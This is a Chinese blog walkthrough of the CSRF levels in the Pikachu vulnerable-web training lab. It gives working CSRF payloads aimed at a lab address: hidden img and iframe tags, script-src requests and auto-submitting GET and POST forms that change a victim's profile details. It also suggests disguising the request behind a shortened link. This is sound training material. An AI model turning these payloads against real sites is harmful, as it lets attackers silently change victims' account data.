<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>pikachu之CSRF | It&#39;s ok</title>
  <meta name="description" content="在 CSRF 的攻击场景中，攻击者会伪造一个请求，这个请求一般都是修改一些参数之类的请求，然后诱骗目标发送这个请求，一旦目标发送了这个请求，整个攻击就完成了。  CSRF 常常与 XSS 混淆：CSRF 是借用户的权限完成攻击，攻击者并没有拿到用户的权限，而 XSS 是直接盗取到了用户的权限，然后实施破坏。  GET这里的账号密码我就不去尝试了，直接用 tips 里面的账号密码这里我引入一个场景">
<meta property="og:type" content="article">
<meta property="og:title" content="pikachu之CSRF">
<meta property="og:url" content="https://corsnail.github.io/2024/04/25/pikachu%E4%B9%8BCSRF/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="在 CSRF 的攻击场景中，攻击者会伪造一个请求，这个请求一般都是修改一些参数之类的请求，然后诱骗目标发送这个请求，一旦目标发送了这个请求，整个攻击就完成了。  CSRF 常常与 XSS 混淆：CSRF 是借用户的权限完成攻击，攻击者并没有拿到用户的权限，而 XSS 是直接盗取到了用户的权限，然后实施破坏。  GET这里的账号密码我就不去尝试了，直接用 tips 里面的账号密码这里我引入一个场景">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425153503415.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425153432810.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425153703239.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425153837600.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425153925083.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425154218204.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425154342365.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425154452418.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425160026210.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425160152936.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425161214132.png">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425164639231.gif">
<meta property="og:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425165504249.png">
<meta property="article:published_time" content="2024-04-25T09:24:30.000Z">
<meta property="article:modified_time" content="2024-04-25T09:25:03.988Z">
<meta property="article:author" content="snail">
<meta property="article:tag" content="pikachu">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://corsnail.github.io/images/article/20240425/IMG-20240425153503415.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://corsnail.github.io/2024/04/25/pikachu%E4%B9%8BCSRF/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 6.3.0"></head>


<body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/corsnail" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">snail</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md"></h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav menu-highlight">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">项目</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">友链</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/corsnail" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">分类</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Re/">Re</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/hexo/">hexo</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web/">web</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/wp/">wp</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%8A%80%E6%9C%AF%E5%88%86%E4%BA%AB/">技术分享</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E7%AE%97%E6%B3%95/">算法</a><span class="category-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/hexo/" rel="tag">hexo</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/leetcode/" rel="tag">leetcode</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/linux/" rel="tag">linux</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pikachu/" rel="tag">pikachu</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/z3/" rel="tag">z3</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/CTF/" style="font-size: 13.5px;">CTF</a> <a href="/tags/hexo/" style="font-size: 13px;">hexo</a> <a href="/tags/leetcode/" style="font-size: 13px;">leetcode</a> <a href="/tags/linux/" style="font-size: 13px;">linux</a> <a href="/tags/pikachu/" style="font-size: 14px;">pikachu</a> <a href="/tags/z3/" style="font-size: 13px;">z3</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/04/">四月 2024</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/03/">三月 2024</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/11/">十一月 2023</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">七月 2023</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/06/">六月 2023</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web/">web</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/25/pikachu%E4%B9%8BCSRF/" class="title">pikachu之CSRF</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-25T09:24:30.000Z" itemprop="datePublished">2024-04-25</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web/">web</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/25/pikachu%E4%B9%8BRCE/" class="title">pikachu之RCE</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-25T06:49:20.000Z" itemprop="datePublished">2024-04-25</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/wp/">wp</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/24/paluctf/" class="title">paluctf wp</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-24T10:15:24.000Z" itemprop="datePublished">2024-04-24</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/web/">web</a>
              </p>
              <p class="item-title">
                <a href="/2024/04/19/pikachu%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/" class="title">pikachu之暴力破解</a>
              </p>
              <p class="item-date">
                <time datetime="2024-04-19T07:15:24.000Z" itemprop="datePublished">2024-04-19</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/wp/">wp</a>
              </p>
              <p class="item-title">
                <a href="/2024/03/21/VenomCTFWP/" class="title">VenomCTF REWP</a>
              </p>
              <p class="item-date">
                <time datetime="2024-03-21T10:47:17.000Z" itemprop="datePublished">2024-03-21</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-pikachu之CSRF" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      pikachu之CSRF
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2024/04/25/pikachu%E4%B9%8BCSRF/" class="article-date">
	  <time datetime="2024-04-25T09:24:30.000Z" itemprop="datePublished">2024-04-25</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/web/">web</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/pikachu/" rel="tag">pikachu</a>
  </span>


        
	<span class="article-read hidden-xs">
	    <i class="icon icon-eye-fill" aria-hidden="true"></i>
	    <span id="busuanzi_container_page_pv">
			<span id="busuanzi_value_page_pv">0</span>
		</span>
	</span>


        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2024/04/25/pikachu%E4%B9%8BCSRF/#comments" class="article-comment-link">评论</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <p>在 CSRF 的攻击场景中，攻击者会伪造一个请求，这个请求一般都是修改一些参数之类的请求，然后诱骗目标发送这个请求，一旦目标发送了这个请求，整个攻击就完成了。</p>
<blockquote>
<p>CSRF 常常与 XSS 混淆：<br>CSRF 是<font color="#ff0000">借用户的权限</font>完成攻击，攻击者并没有拿到用户的权限，<br>而 XSS 是直接<font color="#ff0000">盗取</font>到了用户的权限，然后实施破坏。</p>
</blockquote>
<h1 id="GET"><a href="#GET" class="headerlink" title="GET"></a>GET</h1><p>这里的账号密码我就不去尝试了，直接用 tips 里面的账号密码<br>这里我引入一个场景</p>
<blockquote>
<p>攻击者：vince<br>被攻击者：kobe<br>我是 vince，我想通过 csrf 去修改 kobe 的性别、手机、住址和邮箱</p>
</blockquote>
<p>这里我就首先进入 vince 的管理后台，然后修改信息，然后抓住请求然后让 kobe 发送这条请求</p>
<p>首先进入 vince 后台，修改信息<br><img src="/images/article/20240425/IMG-20240425153503415.png"></p>
<p>抓包<br><img src="/images/article/20240425/IMG-20240425153432810.png"></p>
<p>获取 get 请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://172.17.10.4:8000/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&amp;phonenum=111111&amp;add=%E6%B4%9B%E6%9D%89%E7%9F%B6&amp;email=manbaout&amp;submit=submit</span><br></pre></td></tr></table></figure>

<p>退出登录</p>
<p>模拟 kobe 登录后台<br><img src="/images/article/20240425/IMG-20240425153703239.png"></p>
<p>然后发送请求<br><img src="/images/article/20240425/IMG-20240425153837600.png"></p>
<p><img src="/images/article/20240425/IMG-20240425153925083.png"><br>发送往请求之后 kobe 的个人信息已经修改掉了</p>
<p>想象一下，这里修改掉的是密码会发生什么</p>
<h2 id="利用小技巧"><a href="#利用小技巧" class="headerlink" title="利用小技巧"></a>利用小技巧</h2><ol>
<li>短链接<br>使用短链接平台将 url 缩短<br><img src="/images/article/20240425/IMG-20240425154218204.png"></li>
</ol>
<p>这里是将电话修改为 222222 的请求<br><img src="/images/article/20240425/IMG-20240425154342365.png"></p>
<p>然后我们让 kobe 发送这个请求<br><img src="/images/article/20240425/IMG-20240425154452418.png"><br>然后 kobe 的手机改变了</p>
<ol start="2">
<li>结合 xss<br>配合 xss 形成组合拳<br>只要标签有 src 属性就可以尝试，包括 <code>scirpt</code>，<code>iframe</code>，<code>img</code> 等标签<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>XSS&amp;CSRF<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;http://172.17.10.4:8000/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&amp;phonenum=333333&amp;add=%E6%B4%9B%E6%9D%89%E7%9F%B6&amp;email=manbaout&amp;submit=submit&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure></li>
</ol>
<p><img src="/images/article/20240425/IMG-20240425160026210.png"></p>
<p>写入一个 xss. html，只要访问 <a target="_blank" rel="noopener" href="http://172.17.10.4:8000/xss.html">http://172.17.10.4:8000/xss.html</a> ，就会把 kobe 的手机号码修改为 333333</p>
<p><img src="/images/article/20240425/IMG-20240425160152936.png"><br>成功</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;http://172.17.10.4:8000/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&amp;phonenum=333333&amp;add=%E6%B4%9B%E6%9D%89%E7%9F%B6&amp;email=manbaout&amp;submit=submit&quot;</span>&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">&quot;http://172.17.10.4:8000/vul/csrf/csrfget/csrf_get_edit.php?sex=%E5%A5%B3&amp;phonenum=333333&amp;add=%E6%B4%9B%E6%9D%89%E7%9F%B6&amp;email=manbaout&amp;submit=submit&quot;</span> <span class="attr">style</span>=<span class="string">&quot;display:none;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>只要有 src 标签都可以尝试</p>
<p>进阶的 html 构造</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>CSRF<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">method</span>=<span class="string">&quot;get&quot;</span> <span class="attr">id</span>=<span class="string">&quot;csrf&quot;</span> <span class="attr">action</span>=<span class="string">&quot;http://172.17.10.4:8000/vul/csrf/csrfget/csrf_get_edit.php?&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;sex&quot;</span> <span class="attr">value</span>=<span class="string">&quot;%E5%A5%B3&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;phonenum&quot;</span> <span class="attr">value</span>=<span class="string">&quot;333333&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;add&quot;</span> <span class="attr">value</span>=<span class="string">&quot;%E6%B4%9B%E6%9D%89%E7%9F%B6&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;email&quot;</span> <span class="attr">value</span>=<span class="string">&quot;manbaout&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;submit&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"> <span class="variable language_">document</span>.<span class="property">forms</span>[<span class="string">&quot;csrf&quot;</span>].<span class="title function_">submit</span>(); </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>该表单通过：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"> <span class="variable language_">document</span>.<span class="property">forms</span>[<span class="string">&quot;csrf&quot;</span>].<span class="title function_">submit</span>(); </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>实现自动触发提交 id 为 csrf 的表单，这个在实战中是比较实用的一个技巧。</p>
<h1 id="POST"><a href="#POST" class="headerlink" title="POST"></a>POST</h1><p>post 请求是没有办法直接伪造 url 实现<br>先抓包看看<br><img src="/images/article/20240425/IMG-20240425161214132.png"><br>结合 xss 实现</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>CSRF<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span> <span class="attr">id</span>=<span class="string">&quot;csrf&quot;</span> <span class="attr">action</span>=<span class="string">&quot;http://172.17.10.4:8000/vul/csrf/csrfpost/csrf_post_edit.php?&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;sex&quot;</span> <span class="attr">value</span>=<span class="string">&quot;famle&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;phonenum&quot;</span> <span class="attr">value</span>=<span class="string">&quot;5&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;add&quot;</span> <span class="attr">value</span>=<span class="string">&quot;lokia&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;email&quot;</span> <span class="attr">value</span>=<span class="string">&quot;manbaout&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">name</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;submit&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"> <span class="variable language_">document</span>.<span class="property">forms</span>[<span class="string">&quot;csrf&quot;</span>].<span class="title function_">submit</span>(); </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>该表单通过：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"> <span class="variable language_">document</span>.<span class="property">forms</span>[<span class="string">&quot;csrf&quot;</span>].<span class="title function_">submit</span>(); </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>实现自动触发提交 id 为 csrf 的表单，这个在实战中是比较实用的一个技巧。</p>
<p><img src="/images/article/20240425/IMG-20240425164639231.gif"></p>
<p>网上看题解有用工具生成 html，感觉差别不大，这里就只放工具名字了<br><code>OWASP CSRFTESTER工具</code></p>
<h1 id="Token"><a href="#Token" class="headerlink" title="Token"></a>Token</h1><p>应该是加上了 token 校验，加上 token 校验难度就高了<br>抓包看看<br><img src="/images/article/20240425/IMG-20240425165504249.png"><br>这时候是 get 请求<br>从国光 dvwa 靶场那看到两种方法 ()</p>
<ol>
<li>构造 html 实现 csrf</li>
<li>JS 发起 HTTP CSRF 请求<br>尝试未果，作罢，这个 token 绕过有点难</li>
</ol>
<p>参考：<br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/henry666/p/16947270.html">Pikachu靶场全关攻略(超详细!)</a><br><a target="_blank" rel="noopener" href="https://www.sqlsec.com/2020/05/dvwa.html">国光dvwa教程</a></p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="https://corsnail.github.io/2024/04/25/pikachu%E4%B9%8BCSRF/" title="pikachu之CSRF" target="_blank" rel="external">https://corsnail.github.io/2024/04/25/pikachu之CSRF/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/corsnail" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/corsnail" target="_blank"><span class="text-dark">snail</span><small class="ml-1x"></small></a></h3>
        <div>个人简介。</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    
    <li class="next">
      <a href="/2024/04/25/pikachu%E4%B9%8BRCE/" title="pikachu之RCE"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="qq,wechat" data-mobile-sites="qq,qzone"></div>
    
  </div>
  </div>
</nav>
  


</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/corsnail" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
